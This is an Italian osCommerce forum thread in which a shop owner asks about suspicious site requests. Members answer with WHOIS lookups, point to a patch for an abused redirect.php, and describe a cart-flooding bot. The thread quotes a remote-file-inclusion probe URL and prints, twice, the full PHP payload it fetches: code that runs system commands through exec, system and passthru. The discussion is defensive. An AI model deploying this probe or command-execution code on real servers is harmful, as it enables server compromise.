Tentativo hackeraggio !?
Moderatore: mod Generali
Tentativo hackeraggio !?
Salve a tutti, ho notato una serie di accessi anomali al sito. Qualcuno sa con certezza di cosa si tratta ? Ho caricato uno screeshot al seguente url :
"http://www.computer-company.it/yescolombia.jpg"
"http://www.computer-company.it/yescolombia.jpg"
- mario porta
- membro Regular
- Messaggi: 105
- Iscritto il: 04/08/2006, 10:34
- Località: Milano
- Contatta:
Vediamo...
IP 74.6.28.18
OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US
YAHOO CRAWLER
-------------------
IP 208.36.144.10
OrgName: XO Communications
OrgID: XOXO
Address: Corporate Headquarters
Address: 11111 Sunset Hills Road
City: Reston
StateProv: VA
PostalCode: 20190-5339
Country: US
XO CRAWLER
-----------------
IP 221.143.43.211
inetnum: 221.138.0.0 - 221.143.255.255
netname: HANANET
descr: Hanaro Telecom, Inc.
descr: 726, JangHang-2dong, ILSAN-Gu, Goyang-Si, Kyonggi-Do
country: KR
PROBABILE SPAM SERVER
------------------------
Nulla di preoccupante pero';)...
ciao!
OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US
YAHOO CRAWLER
-------------------
IP 208.36.144.10
OrgName: XO Communications
OrgID: XOXO
Address: Corporate Headquarters
Address: 11111 Sunset Hills Road
City: Reston
StateProv: VA
PostalCode: 20190-5339
Country: US
XO CRAWLER
-----------------
IP 221.143.43.211
inetnum: 221.138.0.0 - 221.143.255.255
netname: HANANET
descr: Hanaro Telecom, Inc.
descr: 726, JangHang-2dong, ILSAN-Gu, Goyang-Si, Kyonggi-Do
country: KR
PROBABILE SPAM SERVER
------------------------
Nulla di preoccupante pero';)...
ciao!
Grazie ad OScommerceItalia oggi abbiamo http://www.pemcomputer.com
Sta succedendo ancora... mi sembrano dei comandi. Qualcuno sa dirmi cosa cercano di fare ? cercano qualche falla ?
nuovo screenshot :
http://www.computer-company.it/ancora.jpg
nuovo screenshot :
http://www.computer-company.it/ancora.jpg
- mario porta
- membro Regular
- Messaggi: 105
- Iscritto il: 04/08/2006, 10:34
- Località: Milano
- Contatta:
in effetti...
..si' e' uno spammer,...
Il problema e' che sta' sfruttando il tuo redirect.php per "ingannare" i siti.
Devi applicare la patch per il redirect,...prova questo:
http://www.oscommerce.com/community/contributions,3676
e magari leggiti questo:
http://programmin.prim8.net/archives/21 ... patch.html
-------------
Per provare se il tutto funziona,...puoi "sfruttare" la stessa istruzione dello spammer e fai cosi':
http://www.NOMEDELTUOSITO.XXX/redirect. ... action=url
Se non usi la root,..prima del REDIRECT.PHP mettici la cartella giusta.
Magari manda anche una mail all'ISP ( 9 su 10 non ti cagano,..pero' tentar non nuoce).
_______________
OrgName: Yipes Communications, Inc.
OrgID: YIPS
Address: 114 Sansome Street
City: San Francisco
StateProv: CA
PostalCode: 94104
Country: US
NetRange: 66.227.0.0 - 66.227.127.255
CIDR: 66.227.0.0/17
NetName: YIPES-BLK5
NetHandle: NET-66-227-0-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YIPES.COM
NameServer: NS2.YIPES.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-01-31
Updated: 2002-10-24
RTechHandle: IY10-ARIN
RTechName: Yipes Communications, Inc.
RTechPhone: 1-877-740-6600
RTechEmail: hostmaster@yipes.com
OrgAbuseHandle: ABUSE21-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-303-785-4450
OrgAbuseEmail: abuse@yipes.com
OrgTechHandle: IY10-ARIN
OrgTechName: Yipes Communications, Inc.
OrgTechPhone: 1-877-740-6600
OrgTechEmail: hostmaster@yipes.com
# ARIN WHOIS database, last updated 2007-09-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
OrgName: Yipes Communications, Inc.
OrgID: YIPS
Address: 114 Sansome Street
City: San Francisco
StateProv: CA
PostalCode: 94104
Country: US
Comment:
RegDate: 2000-04-13
Updated: 2006-04-19
AbuseHandle: ABUSE21-ARIN
AbuseName: Abuse
________________
Facci sapere!!
ciao!
Il problema e' che sta' sfruttando il tuo redirect.php per "ingannare" i siti.
Devi applicare la patch per il redirect,...prova questo:
http://www.oscommerce.com/community/contributions,3676
e magari leggiti questo:
http://programmin.prim8.net/archives/21 ... patch.html
-------------
Per provare se il tutto funziona,...puoi "sfruttare" la stessa istruzione dello spammer e fai cosi':
http://www.NOMEDELTUOSITO.XXX/redirect. ... action=url
Se non usi la root,..prima del REDIRECT.PHP mettici la cartella giusta.
Magari manda anche una mail all'ISP ( 9 su 10 non ti cagano,..pero' tentar non nuoce).
_______________
OrgName: Yipes Communications, Inc.
OrgID: YIPS
Address: 114 Sansome Street
City: San Francisco
StateProv: CA
PostalCode: 94104
Country: US
NetRange: 66.227.0.0 - 66.227.127.255
CIDR: 66.227.0.0/17
NetName: YIPES-BLK5
NetHandle: NET-66-227-0-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YIPES.COM
NameServer: NS2.YIPES.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-01-31
Updated: 2002-10-24
RTechHandle: IY10-ARIN
RTechName: Yipes Communications, Inc.
RTechPhone: 1-877-740-6600
RTechEmail: hostmaster@yipes.com
OrgAbuseHandle: ABUSE21-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-303-785-4450
OrgAbuseEmail: abuse@yipes.com
OrgTechHandle: IY10-ARIN
OrgTechName: Yipes Communications, Inc.
OrgTechPhone: 1-877-740-6600
OrgTechEmail: hostmaster@yipes.com
# ARIN WHOIS database, last updated 2007-09-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
OrgName: Yipes Communications, Inc.
OrgID: YIPS
Address: 114 Sansome Street
City: San Francisco
StateProv: CA
PostalCode: 94104
Country: US
Comment:
RegDate: 2000-04-13
Updated: 2006-04-19
AbuseHandle: ABUSE21-ARIN
AbuseName: Abuse
________________
Facci sapere!!
ciao!
Grazie ad OScommerceItalia oggi abbiamo http://www.pemcomputer.com
-
- membro Junior
- Messaggi: 3
- Iscritto il: 02/11/2007, 18:23
IP di furbo nel mio sito commerciale
salve, dalle 13 alle 18 un furbo con ip che ho localizzato ad Amsterdam si è divertito a fare acquisti nel mio sito sviluppato su piattaforma osCommerce; caricando a carrello prodotti informatici per oltre 700000 euro, fortuna vuole che il mio sito preveda la login che ovviamente il furbo (secondo lui forse lo è) non ha fatto; segnalo la cosa visto che so che non sono il primo ad aver subito tale attacco, preciso una cosa che forse non è casuale, negli ultimi giorni ricevo visite da un ip localizzato in california, stranamente dopo lo stesso nel giro di 1 ora appare puntuale un ip localizzato ad Amsterdam che carica ogni 40 secondi un prodotto per ore e ore,
IP del FURBO o del software che agisce in automatico:
IP 85.17.211.75 : 
IP del FURBO o del software che agisce in automatico:


Prima di tutto grazie per la dritta... ho applicato la patch e penso che non dovrebbero esserci più problemi in tal senso.
Continuano però ad arrivarmi comandi strani tipo questo :
http://www.miosito.it/?cPath=http://www ... .txt%3f%3f
devo preoccuparmi ?
Continuano però ad arrivarmi comandi strani tipo questo :
http://www.miosito.it/?cPath=http://www ... .txt%3f%3f
devo preoccuparmi ?
- mario porta
- membro Regular
- Messaggi: 105
- Iscritto il: 04/08/2006, 10:34
- Località: Milano
- Contatta:
Si vede che ci provano,...e' un classico,...a me arrivano attacchi in continuazione,...al primo posto l'asia..
....ecco cosa porta il link che hai messo:
-------------------
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
exit;
----------------------
Esegue un po' di istruzioni,...( non me ne intendo troppo di PHP ),...pero' l'ho lanciato in locale e mi restituisce questo:
Mic22
OSTYPE:Windows NT PEM-SHOP 5.1 build 2600
Free:23.1 GB
E' una shell in php, o meglio l'accesso ai comandi di shell, funziona solo su siti che sono vulnerabili a injection xsl, praticamente quasi nessuno ormai.
Per sicurezza pero'...
Chiediamo a chi ne sa' di piu', cosa sono quei Get e quella Shell...
Ora controllo bene,...ci aggiorniamo,...
ciao!

-------------------
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
exit;
----------------------
Esegue un po' di istruzioni,...( non me ne intendo troppo di PHP ),...pero' l'ho lanciato in locale e mi restituisce questo:
Mic22
OSTYPE:Windows NT PEM-SHOP 5.1 build 2600
Free:23.1 GB
E' una shell in php, o meglio l'accesso ai comandi di shell, funziona solo su siti che sono vulnerabili a injection xsl, praticamente quasi nessuno ormai.
Per sicurezza pero'...
Chiediamo a chi ne sa' di piu', cosa sono quei Get e quella Shell...
Ora controllo bene,...ci aggiorniamo,...
ciao!
Grazie ad OScommerceItalia oggi abbiamo http://www.pemcomputer.com